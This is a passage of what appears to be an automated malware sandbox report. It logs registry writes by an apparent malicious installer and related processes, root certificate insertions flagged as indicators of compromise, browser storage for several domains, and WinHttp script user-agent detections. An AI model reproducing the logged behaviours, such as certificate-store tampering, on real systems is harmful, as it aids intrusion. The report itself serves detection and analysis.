Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" msiexec.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 08dfd237e7c2d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "451" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "518" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1270" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "48" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\stocks.etoro.com\ = "124" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1345" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\etoro.com\Total = "37" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\hio9.xyz MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1762" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\hio9.xyz\NumberOfSubdomain = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\33across.com\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1f6a83fce8c2d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\etoro.com\Total = "368" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.adsaro.net\ = "28" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\myfreshspot.com\Total = "47" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1591" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d32e5a31e7c2d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\hio9.xyz\Total = "207" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\adsaro.net\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.adsaro.net\ = "90" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 3079e009eec2d701 MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Mon178e7a516181.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c0000000100000004000000000800000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Mon178e7a516181.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD rundll32.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c0000000100000004000000000800000f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 7 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 606 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2945 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 226 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 504 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 508 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 599 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
